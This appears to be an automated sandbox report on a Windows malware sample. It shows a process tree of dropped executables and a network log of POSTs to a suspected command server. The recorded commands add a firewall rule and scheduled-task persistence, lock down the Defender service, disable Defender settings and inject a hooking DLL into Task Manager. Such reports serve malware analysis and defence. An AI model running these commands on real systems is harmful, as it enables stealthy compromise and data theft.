PID 916 wrote to memory of 5100	916	Aw1Fg24.exe	78
PID 916 wrote to memory of 5100	916	Aw1Fg24.exe	78
PID 5100 wrote to memory of 3724	5100	3hY45iH.exe	80
PID 5100 wrote to memory of 3724	5100	3hY45iH.exe	80
PID 5100 wrote to memory of 3724	5100	3hY45iH.exe	80
PID 5100 wrote to memory of 3724	5100	3hY45iH.exe	80
PID 5100 wrote to memory of 3724	5100	3hY45iH.exe	80
PID 5100 wrote to memory of 3724	5100	3hY45iH.exe	80
PID 5100 wrote to memory of 3724	5100	3hY45iH.exe	80
PID 5100 wrote to memory of 3724	5100	3hY45iH.exe	80
PID 5100 wrote to memory of 3724	5100	3hY45iH.exe	80
PID 5100 wrote to memory of 3724	5100	3hY45iH.exe	80
PID 3920 wrote to memory of 5004	3920	Js9LV27.exe	81
PID 3920 wrote to memory of 5004	3920	Js9LV27.exe	81
PID 3920 wrote to memory of 5004	3920	Js9LV27.exe	81
PID 5004 wrote to memory of 4128	5004	4Jw422oZ.exe	85
PID 5004 wrote to memory of 4128	5004	4Jw422oZ.exe	85
PID 5004 wrote to memory of 4128	5004	4Jw422oZ.exe	85
PID 5004 wrote to memory of 4128	5004	4Jw422oZ.exe	85
PID 5004 wrote to memory of 4128	5004	4Jw422oZ.exe	85
PID 5004 wrote to memory of 4128	5004	4Jw422oZ.exe	85
PID 5004 wrote to memory of 4128	5004	4Jw422oZ.exe	85
PID 5004 wrote to memory of 4128	5004	4Jw422oZ.exe	85
PID 5004 wrote to memory of 4128	5004	4Jw422oZ.exe	85
PID 4900 wrote to memory of 64	4900	Hd9In64.exe	86
PID 4900 wrote to memory of 64	4900	Hd9In64.exe	86
PID 4900 wrote to memory of 64	4900	Hd9In64.exe	86
PID 1216 wrote to memory of 2792	1216	9239fbd8d1a3f690c548416c61b5b7502787a8cda9b789db4f008805b8d6763a.exe	87
PID 1216 wrote to memory of 2792	1216	9239fbd8d1a3f690c548416c61b5b7502787a8cda9b789db4f008805b8d6763a.exe	87
PID 1216 wrote to memory of 2792	1216	9239fbd8d1a3f690c548416c61b5b7502787a8cda9b789db4f008805b8d6763a.exe	87
PID 3264 wrote to memory of 2120	3264	Process not Found	88
PID 3264 wrote to memory of 2120	3264	Process not Found	88
PID 3264 wrote to memory of 2120	3264	Process not Found	88
PID 3264 wrote to memory of 4592	3264	Process not Found	89
PID 3264 wrote to memory of 4592	3264	Process not Found	89
PID 3264 wrote to memory of 4592	3264	Process not Found	89
PID 2120 wrote to memory of 4960	2120	500F.exe	91
PID 2120 wrote to memory of 4960	2120	500F.exe	91
PID 2120 wrote to memory of 4960	2120	500F.exe	91
PID 2120 wrote to memory of 1708	2120	500F.exe	92

C:\Users\Admin\AppData\Local\Temp\9239fbd8d1a3f690c548416c61b5b7502787a8cda9b789db4f008805b8d6763a.exe
"C:\Users\Admin\AppData\Local\Temp\9239fbd8d1a3f690c548416c61b5b7502787a8cda9b789db4f008805b8d6763a.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1216
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Hd9In64.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Hd9In64.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4900
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Js9LV27.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Js9LV27.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3920
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Aw1Fg24.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Aw1Fg24.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:916
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wm1893.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wm1893.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1472
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:4160
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:4696
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3hY45iH.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3hY45iH.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:5100
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:3724
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 568
        7⤵
        Program crash
        
        PID:5084
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Jw422oZ.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Jw422oZ.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:5004
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:4128
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5jH1Cp0.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5jH1Cp0.exe
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:64
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Gb5kN7.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Gb5kN7.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Executes dropped EXE
  - Windows security modification
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2792

C:\Users\Admin\AppData\Local\Temp\500F.exe
C:\Users\Admin\AppData\Local\Temp\500F.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2120
- C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
  "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
  2⤵
  - Executes dropped EXE
  PID:4960
- - C:\Users\Admin\AppData\Local\Temp\Broom.exe
    C:\Users\Admin\AppData\Local\Temp\Broom.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4488
- C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
  "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1708
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:2672
- C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
  "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1360
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2720
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    - Checks for VirtualBox DLLs, possible anti-VM trick
    - Modifies data under HKEY_USERS
    PID:4500
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious use of AdjustPrivilegeToken
      PID:4860
  - - C:\Windows\System32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:5088
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:1640
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:2644
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:4364
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      PID:2828
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4888
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:2668
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        5⤵
        
        PID:3900
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4884
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4808
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        
        PID:2936
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:2336
    - - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        5⤵
        
        PID:1248
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        Launches sc.exe
        
        PID:804
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        
        PID:3800
      - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        Launches sc.exe
        
        PID:4800

C:\Users\Admin\AppData\Local\Temp\5271.exe
C:\Users\Admin\AppData\Local\Temp\5271.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4592

C:\Users\Admin\AppData\Local\Temp\AF48.exe
C:\Users\Admin\AppData\Local\Temp\AF48.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4016
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  2⤵
  PID:4540

C:\Users\Admin\AppData\Local\Temp\B247.exe
C:\Users\Admin\AppData\Local\Temp\B247.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4280

C:\Users\Admin\AppData\Local\Temp\C468.exe
C:\Users\Admin\AppData\Local\Temp\C468.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:4388
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  2⤵
  PID:2640
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  2⤵
  PID:3108

C:\Users\Admin\AppData\Local\Temp\C796.exe
C:\Users\Admin\AppData\Local\Temp\C796.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4944

C:\Users\Admin\AppData\Local\Temp\CA75.exe
C:\Users\Admin\AppData\Local\Temp\CA75.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:760

C:\Users\Admin\AppData\Local\Temp\3E00.exe
C:\Users\Admin\AppData\Local\Temp\3E00.exe
1⤵
PID:4796
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  2⤵
  PID:4868

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
1⤵
PID:4344

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:1588

Network

DNS

218.240.110.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

218.240.110.104.in-addr.arpa

IN PTR

Response

218.240.110.104.in-addr.arpa

IN PTR

a104-110-240-218deploystaticakamaitechnologiescom
DNS

herioteeakl.pw

AppLaunch.exe

Remote address:

8.8.8.8:53

Request

herioteeakl.pw

IN A

Response

herioteeakl.pw

IN A

104.21.42.121

herioteeakl.pw

IN A

172.67.161.219
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 8
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=33t38cgvpsua1bcj8t1hr4e716; expires=Fri, 08 Mar 2024 18:47:41 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:02 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D%2F304xbJeyyCNdAWw%2FPWJ6rEaZVpXREQvGbQp70JOKEjllcYW%2BxoBg87QzfMKX3%2FHxel8NUIW8HsU61HHd1d5BZSsX7LXpFupzN4LYqiztEev2CWHLFfix5Mkh8paYZJGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b522afa400a58-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=m0ujkk3igb2teakcrk1rqqopo3; expires=Fri, 08 Mar 2024 18:47:42 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:03 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iibaNYaUDkHJA%2BdTshgzRutxx7CT4xhcJSuGfN3ZTLGe3Pi7YRAh5bXLsDQ6OGSKZAA0jIZA%2Bzz8rOx6ChmaIeqNAoAtR4j%2Bhi%2BSKJQJI04cBXmHDp%2B8g6OtJxyFAQwh3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b522ddc780a58-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: herioteeakl.pw
Content-Length: 64
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=e1e81jgm0elh318v43p9u5cbc5; expires=Fri, 08 Mar 2024 18:47:41 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:02 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n6USYgxxy4KLFQo%2BQYx5ERS8bYdLrlspPYzvzDTryBc0fH0ZtS7vsLK1wygjwi0DFM6UkimsBPVYKrlwT1wN22epRkryDIZ2WMWf83DiCdaHoIoeo98bHeeYlzuoEEomGA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b522c88a36697-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ii2i5iual8pug0ilf2mpup0cen; expires=Fri, 08 Mar 2024 18:47:42 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:03 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vw14gYlGjOSiGOh5s%2F5J5BAI8HMQW6f934evCW47rFgJqWyvIUz6v8wI4MJBld2NK43UPbNtpMChinroaPwYerBoIoJ%2FbMrM%2FuhTpBOd5%2Bo3HbTkl3tXC%2BJjdYRpGvyvEA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b522ed81b671a-AMS
DNS

121.42.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

121.42.21.104.in-addr.arpa

IN PTR

Response
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=rh98jbis67eu1um2e6rptarjp7; expires=Fri, 08 Mar 2024 18:47:42 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:03 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L6RYx3mL%2B5BM73mN2%2FfjquheX1LJRdZXprxHEoDP5KtD9hccP%2Bxja43kdfdiT9xlSY5hjYclFDFNLYcJUs6UZZr7r8PWcXWtCyqbdo8wqqseH%2B0Erm3AM%2FR9RMndiUhN5g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52301bbb0e87-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=6vlj86lgb61dsgemm6h7quff06; expires=Fri, 08 Mar 2024 18:47:42 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:03 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YleBPnOLl1BbUWeRhw0w6n9ktOvdnR3Iwjxo%2Bh4LWEw1R5ngEJZcJuZHM7zuGhQ33PiN2VHDywGBVmEFRp1zB6blwWMcgaVsFemXo8ihAbdmRgAFwufbS8wVajwPUZ1k4g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52312eef1cae-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=qvbquf3r6cp3jluigq5e7nmfsr; expires=Fri, 08 Mar 2024 18:47:42 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:03 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FynSWcuepNlJYTaZCRQPF30Lj1Biq6jjbvONlAuEn8c8sgj5v%2BuzA5FsKTA3HoMDcFN1yQkYwJ2iA7vlCn%2FlNoH56kRpknpqowWJVlEWr9hroL3zNTmHkvcvQW7rmf5nrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52322aeb0bea-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=sopq8eu4p4hnfm29jkib771666; expires=Fri, 08 Mar 2024 18:47:43 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:04 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
